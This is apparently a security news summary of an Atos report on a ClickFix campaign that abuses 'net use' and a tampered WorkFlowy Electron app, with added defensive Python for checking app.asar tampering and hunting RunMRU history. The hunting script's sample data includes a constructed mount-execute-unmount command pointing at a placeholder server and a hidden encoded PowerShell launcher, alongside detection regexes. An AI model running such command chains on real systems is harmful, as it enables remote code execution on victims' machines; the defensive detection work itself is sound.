ClickFix attacks — where threat actors trick users into executing malicious commands through their own keyboard shortcuts — have typically relied on PowerShell or mshta as the execution layer. Researchers at Atos have now documented a variant that abandons both tools in favor of a less scrutinized Windows utility, producing an infection chain that evaded Microsoft Defender for Endpoint entirely.
According to the report, the attack begins at a fake CAPTCHA page hosted at happyglamper[.]ro. The page instructs visitors to open the Windows Run dialog via Win+R, then paste and execute a pre-loaded command using Ctrl+V and Enter — the standard ClickFix social engineering loop. What diverges here is what runs next.
Rather than invoking PowerShell or mshta directly, the injected command uses net use to map a network drive from an external server. A batch script — update.cmd — is then pulled from that mapped drive and executed, after which the drive is immediately removed. The report notes this technique, while not novel on its own, had not previously been observed in ClickFix campaigns.
The WorkFlowy Disguise
The batch script spawns a PowerShell instance that downloads a ZIP archive and extracts it to %LOCALAPPDATA%\MyApp\, then launches WorkFlowy.exe. The archive contains a legitimate WorkFlowy desktop application — version 1.4.1050, signed by developer FunRoutine Inc. and distributed as an Electron package. The legitimacy of the signed binary serves as a layer of plausible cover.
Electron applications bundle their source code inside .asar archives. The attackers replaced the legitimate resources/app.asar with a repackaged version containing injected malicious code inside main.js, the Node.js entry point. The researchers note the attackers used version 1.4 rather than the current v4.3, suggesting the repackaging was deliberate and version-specific. The injected code is a heavily obfuscated one-liner prepended to the legitimate application code, ensuring it executes first while blocking normal WorkFlowy functionality.
Because the malicious code runs in the Node.js main process — outside the Chromium sandbox — it operates with the full privileges of the logged-in user. No files beyond the archive itself are written to disk during execution, and the payload generates no OS-level persistence. The report states that if the command-and-control connection is not established, no files or directories are created at all. At the time of analysis, the C2 domain was already unresponsive.
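The two checks a responder would want for this kind of tampered Electron package are a content comparison of the shipped resources/app.asar against a clean copy of the same version, and a look at whether main.js now opens with a prepended, obfuscated one-liner. The following is an added example, not code from the Atos report or from WorkFlowy; it assumes the asar container layout (an 8-byte size pickle, a pickle-encoded JSON directory starting at byte 16, then file bytes at offsets relative to the end of the header), handles a flat archive when packing, and uses constructed sample data and heuristic thresholds (first-line length, byte entropy, dynamic-code constructs) that are assumptions to tune against your own baseline.

```python
"""Triage an Electron app.asar for a loader prepended to main.js (added example)."""
import hashlib
import json
import math
import random
import re
import struct

# --- asar container: 8-byte size pickle, header pickle (JSON directory), then file bytes ---

def _pickle_string(payload: bytes) -> bytes:
    """Pickle-encode a string: uint32 length, bytes, zero-padded to 4-byte alignment."""
    body = struct.pack("<I", len(payload)) + payload
    return body + b"\0" * (-len(body) % 4)

def build_asar(files: dict) -> bytes:
    """Pack a flat set of files (no subdirectories) in the asar layout."""
    directory = {"files": {}}
    blobs = b""
    for name, data in files.items():
        directory["files"][name] = {"size": len(data), "offset": str(len(blobs))}
        blobs += data
    header_pickle = _pickle_string(json.dumps(directory).encode())
    header_pickle = struct.pack("<I", len(header_pickle)) + header_pickle  # pickle header = payload size
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + blobs

def read_asar(blob: bytes):
    """Return (directory, data_base_offset). JSON starts at byte 16; data follows the header pickle."""
    header_pickle_len = struct.unpack_from("<I", blob, 4)[0]
    json_len = struct.unpack_from("<I", blob, 12)[0]
    directory = json.loads(blob[16:16 + json_len])
    return directory, 8 + header_pickle_len

def extract_file(blob: bytes, path: str) -> bytes:
    directory, base = read_asar(blob)
    node = directory
    for part in path.split("/"):          # walk nested directories if present
        node = node["files"][part]
    start = base + int(node["offset"])
    return blob[start:start + node["size"]]

def diff_asar(suspect: bytes, reference: bytes) -> list:
    """Names of top-level files whose content differs from a known-good app.asar of the same version."""
    s_dir, _ = read_asar(suspect)
    r_dir, _ = read_asar(reference)
    def digest(blob, d, name):
        return hashlib.sha256(extract_file(blob, name)).hexdigest() if name in d["files"] else None
    names = sorted(set(s_dir["files"]) | set(r_dir["files"]))
    return [n for n in names if digest(suspect, s_dir, n) != digest(reference, r_dir, n)]

# --- content heuristics for the Node.js entry point ---

def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    counts = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())

DYNAMIC_CODE = re.compile(rb"\beval\s*\(|\bnew\s+Function\s*\(|String\.fromCharCode|Buffer\.from\([^)]*['\"]base64['\"]")

def assess_main_js(src: bytes, max_first_line=1000, min_entropy=5.0) -> dict:
    """Flag a first line that looks like a prepended obfuscated one-liner rather than normal source."""
    first = src.split(b"\n", 1)[0]
    findings = []
    if len(first) > max_first_line:
        findings.append("long_first_line")
    if shannon_entropy(first) >= min_entropy:
        findings.append("high_entropy_first_line")
    if DYNAMIC_CODE.search(first):
        findings.append("dynamic_code_construction")
    return {"first_line_length": len(first), "findings": findings, "suspicious": len(findings) >= 2}

# --- constructed sample: a clean entry point and the same file with a bogus loader prepended ---

CLEAN_MAIN_JS = b"\n".join([
    b"const { app, BrowserWindow } = require('electron');",
    b"app.whenReady().then(() => new BrowserWindow({ width: 1200, height: 800 }).loadFile('index.html'));",
])
_rng = random.Random(20240101)          # fixed seed so the sample is reproducible
_ALPHABET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/"
_blob = "".join(_rng.choice(_ALPHABET) for _ in range(1500))
INJECTED_LINE = f'(function(){{var _0x=["{_blob}"];eval(_0x[0]);}})();'.encode()  # placeholder, not real malware
TAMPERED_MAIN_JS = INJECTED_LINE + b"\n" + CLEAN_MAIN_JS

CLEAN_ASAR = build_asar({"main.js": CLEAN_MAIN_JS, "package.json": b'{"main":"main.js"}'})
TAMPERED_ASAR = build_asar({"main.js": TAMPERED_MAIN_JS, "package.json": b'{"main":"main.js"}'})

def triage(suspect: bytes, reference: bytes) -> dict:
    changed = diff_asar(suspect, reference)
    verdict = assess_main_js(extract_file(suspect, "main.js"))
    return {"changed_files": changed, **verdict}

if __name__ == "__main__":
    print(json.dumps(triage(TAMPERED_ASAR, CLEAN_ASAR), indent=2))
```

Run it as-is to see the constructed tampered archive flagged on all three heuristics with main.js as the only changed file; against a real installation, feed the bytes of the installed resources/app.asar and of the same version's clean package to triage(). The hash comparison is the reliable signal when a clean copy is available; the first-line heuristics are a fallback for triage when it is not.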
Detection and Defense Posture
The campaign bypassed Microsoft Defender for Endpoint without triggering alerts. Atos security teams identified it only through an internal threat hunting service focused on a behavioral indicator specific to ClickFix: initial execution logged through the RunMRU registry key. The firm has published the corresponding hunting query in the report’s appendix.
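The RunMRU key records what a user typed into Win+R, which is why it catches the net use chain described above even when PowerShell and mshta never appear. As an added example that is not the Atos hunting query, the script below orders the RunMRU slots by their MRUList value, strips the trailing backslash-1 suffix the dialog appends to each entry, and scores each command against weighted heuristics for the mount-execute-unmount pattern and for the more familiar PowerShell and mshta launchers. The heuristics, their weights and the threshold are assumptions to tune against your environment; the sample entries are constructed (documentation IP space, placeholder arguments) and are not the campaign's own command.

```python
"""Hunt RunMRU (Win+R history) for ClickFix-style execution chains (added example)."""
import re

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"   # under HKCU

# Weighted heuristics, constructed for this example; tune them against your own baseline.
INDICATORS = [
    ("net_use_unc_mount",   3, re.compile(r"\bnet\s+use\b.*\\\\\S+", re.I)),
    ("net_use_then_script", 2, re.compile(r"\bnet\s+use\b.*\\\\\S+.*\.(cmd|bat|ps1|vbs|js|hta)\b", re.I)),
    ("net_use_delete",      1, re.compile(r"\bnet\s+use\b.*/delete\b", re.I)),
    ("powershell_launcher", 3, re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*(-e(c|nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden"
        r"|\biex\b|downloadstring|frombase64string)", re.I)),
    ("mshta_launcher",      3, re.compile(r"\bmshta(\.exe)?\b", re.I)),
    ("command_chaining",    1, re.compile(r"&&|\|\||;")),
]
SUSPICIOUS_THRESHOLD = 3   # any single strong launcher indicator is enough to surface the entry

def parse_runmru(values: dict) -> list:
    """Order the a..z slots by MRUList (most recent first) and strip the trailing '\\1' suffix."""
    entries = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is None:
            continue
        entries.append((slot, raw[:-2] if raw.endswith("\\1") else raw))
    return entries

def score_command(command: str) -> tuple:
    """Return (total weight, names of matching indicators) for one Run-dialog command."""
    hits = [name for name, _, rx in INDICATORS if rx.search(command)]
    score = sum(weight for name, weight, _ in INDICATORS if name in hits)
    return score, hits

def triage(values: dict) -> list:
    results = []
    for slot, command in parse_runmru(values):
        score, hits = score_command(command)
        results.append({
            "slot": slot, "command": command, "score": score,
            "indicators": hits, "suspicious": score >= SUSPICIOUS_THRESHOLD,
        })
    return results

def read_runmru_from_registry() -> dict:
    """Read the live key on a Windows host; everything else in this file runs offline."""
    import winreg
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH) as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            values[name] = data
            index += 1
    return values

# Constructed sample of what the key looks like after a benign entry, a mount-execute-unmount
# chain and a hidden PowerShell launcher; MRUList lists the most recent slot first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"cmd /c net use Z: \\203.0.113.10\share && Z:\update.cmd && net use Z: /delete\1",
    "c": r"powershell -w hidden -enc PLACEHOLDER\1",
}

if __name__ == "__main__":
    for entry in triage(SAMPLE_RUNMRU):
        flag = "SUSPICIOUS" if entry["suspicious"] else "ok"
        print(f'{entry["slot"]}: [{flag} score={entry["score"]}] {entry["command"]}  {entry["indicators"]}')
```

On a Windows host, replace SAMPLE_RUNMRU with read_runmru_from_registry() to score the current user's history; for fleet-wide hunting the same scoring runs over RunMRU values collected by your EDR or a registry-collection tool. Note that the key only records what was submitted through the Run dialog, so it is a high-signal but narrow source: commands launched any other way never appear in it.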
The combination of factors — an uncommon initial execution method, a signed legitimate binary as a delivery vehicle, fileless in-memory execution, and payload concealment inside an .asar archive — gives the campaign a meaningful defensive evasion profile. The researchers assess these characteristics collectively offer adversaries a high probability of remaining undetected by standard endpoint controls.
This article is a curated summary based on third-party sources.